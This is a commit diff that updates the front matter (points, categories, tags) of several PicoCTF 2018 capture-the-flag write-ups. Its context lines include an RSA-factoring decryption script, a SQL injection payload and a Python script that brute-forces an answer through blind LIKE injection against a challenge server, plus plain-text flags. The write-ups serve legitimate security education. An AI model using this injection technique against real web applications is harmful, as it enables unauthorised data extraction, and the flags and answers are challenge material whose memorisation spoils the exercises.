start adding points and categories

website/writeups/PicoCTF_2018/88-crypto-600-super-safe-rsa-3.md

@@ -1,10 +1,10 @@
 ---
 layout: writeup
-title: 'Crypto 600: Super Safe RSA 3'
-level: 
-difficulty: 
-points: 
-categories: []
+title: 'Super Safe RSA 3'
+level:
+difficulty:
+points: 600
+categories: [crypto]
 tags: []
 flag: picoCTF{p_&_q_n0_r_$_t!!_6629910}
 ---
@@ -33,24 +33,24 @@ flag:
 
     import gmpy2
     import primefac
-    
-    
+
+
     c = 798969532868241034262201660820334428498697405198819266351660979640918089698370850085963580823359953106591774105288828682672867652949613335290035360447893613465055031850950614550860391928155270420985614349302804909553389682874636771202896787415532131111854204772669056806821882162359339598288501623562730
     n = 3541776961350756146796799821164868207619475719115743434366890478881578624044753627501375811206039117157906709552318526962375639546716015765226846022541932426874729631398855600887631313842537323018023929885623095650914457879588746735283232366011283028664737579701177211757369241731005141006276936915308803
     e = 65537
-    
+
     # find the prime factors
     primes = list(primefac.primefac(n))
-    
+
     # compute totient
     r = 1
     for p in primes:
         r *= p-1
-    
+
     # decrypt
     d = gmpy2.divm(1, e, r)
     m = gmpy2.powmod(c, d, n)
-    
+
     # print flag
     print("".join([chr((m >> j) & 0xff) for j in reversed(range(0, 1000 << 3, 8))]))
 {: .language-python}

website/writeups/PicoCTF_2018/89-reversing-600-special-pw.md

@@ -1,20 +1,20 @@
 ---
 layout: writeup
-title: 'Reversing 600: special-pw'
-level: 
-difficulty: 
-points: 
-categories: []
+title: 'special-pw'
+level:
+difficulty:
+points: 600
+categories: [reversing]
 tags: []
-flag: 
+flag:
 ---
-**Challenge**  
+**Challenge**
 Can you figure out the right argument to this program to login? We
 couldn't manage to get a copy of the binary but we did manage to
 [dump](writeupfiles/special_pw.S) some machine code and memory from the
 running process.
 
-**Hints**  
+**Hints**
 Hmmm maybe if we do the reverse of each operation we can get the
 password?
 

website/writeups/PicoCTF_2018/90-web-exploitation-650-a-simple-question.md

@@ -1,10 +1,10 @@
 ---
 layout: writeup
-title: 'Web Exploitation 650: A Simple Question'
-level: 
-difficulty: 
-points: 
-categories: []
+title: 'A Simple Question'
+level:
+difficulty:
+points: 650
+categories: [web]
 tags: []
 flag: picoCTF{qu3stions_ar3_h4rd_d3850719}
 ---
@@ -29,24 +29,24 @@ Let's see what happens when we enter `' or 'x'='x`
 ![](writeupfiles/simplequestion_close.png)
 
 ok, so we get a different message if the query returns something, this
-we can use.  
+we can use.
 We can give an snwer like `' OR answer LIKE 'a%` to test if it starts
 with a letter a, and build up answer like that. Since this will takea
 while, we script it
 
     import requests
     import string
-    
+
     url="http://2018shell1.picoctf.com:36052/answer2.php"
     alphabet=string.printable.replace('%','').replace("'",'')
     password=''
-    
+
     stop = False
     while not stop:
         for c in alphabet:
             params = {'answer': "' OR answer LIKE '"+password+c+"%", 'debug': '1'}
             r = requests.post(url, data=params)
-    
+
             if "so close" in r.text:
                 password += c
                 print("letter found! "+password)
@@ -55,7 +55,7 @@ while, we script it
                 stop = True
                 print(r.text)
                 break
-    
+
     print(password)
 {: .language-python}
 
@@ -80,12 +80,12 @@ but now what..? this is not the flag, nor the answer to put in the form.
 Nor is `42`
 
 turns out the query wasn't case sensitive, and the answer we are looking
-for is  
+for is
 `41AndSixSixths`. When we put that in the form we get the flag:
 
     SQL query: SELECT * FROM answers WHERE answer='41AndSixSixths'
-    
+
     Perfect!
-    
+
     Your flag is: picoCTF{qu3stions_ar3_h4rd_d3850719}
 

website/writeups/PicoCTF_2018/91-cryptography-700-james-brahm-returns.md

@@ -1,20 +1,21 @@
 ---
 layout: writeup
 title: 'Cryptography 700: James Brahm Returns'
-level: 
-difficulty: 
-points: 
-categories: []
+level:
+difficulty:
+points: 700
+categories: [crypto]
 tags: []
-flag: 
+flag:
 ---
-**Challenge**  
+
+## Challenge
 Dr. Xernon has finally approved an update to James Brahm's spy terminal.
 (Someone finally told them that ECB isn't secure.) Fortunately, CBC mode
 is safe! Right? Connect with nc 2018shell1.picoctf.com 15596.
 [Source.](writeupfiles/james-brahm-returns.py)
 
-**Hints**  
+**Hints**
 What killed SSL3?
 
 ## Solution

website/writeups/PicoCTF_2018/92-web-exploitation-800-lambdash-3.md

@@ -1,12 +1,12 @@
 ---
 layout: writeup
-title: 'Web Exploitation 800: LambDash 3'
-level: 
-difficulty: 
-points: 
-categories: []
+title: 'LambDash 3'
+level:
+difficulty:
+points: 800
+categories: [web]
 tags: []
-flag: 
+flag:
 ---
 ## Challenge
 

website/writeups/PicoCTF_2018/93-general-skills-900-dog-or-frog.md

@@ -1,12 +1,12 @@
 ---
 layout: writeup
-title: 'General Skills 900: Dog or Frog'
-level: 
-difficulty: 
-points: 
-categories: []
+title: 'Dog or Frog'
+level:
+difficulty:
+points: 900
+categories: [general]
 tags: []
-flag: 
+flag:
 ---
 ## Challenge
 

website/writeups/PicoCTF_2018/94-web-exploitation-900-flaskcards-and-freedom.md

@@ -1,11 +1,11 @@
 ---
 layout: writeup
-title: 'Web Exploitation 900: Flaskcards and Freedom'
+title: 'Flaskcards and Freedom'
 level:
 difficulty:
-points:
-categories: []
-tags: []
+points: 900
+categories: [web]
+tags: [SSTI]
 flag: picoCTF{R_C_E_wont_let_me_be_85e92c3a}
 ---
 ## Challenge

website/writeups/PicoCTF_2018/index.md

@@ -5,8 +5,5 @@ title: PicoCTF 2018
 date: 2018-09-28
 
 difficulty: false
-points: false
-
 cover: picoctf.png
-
 ---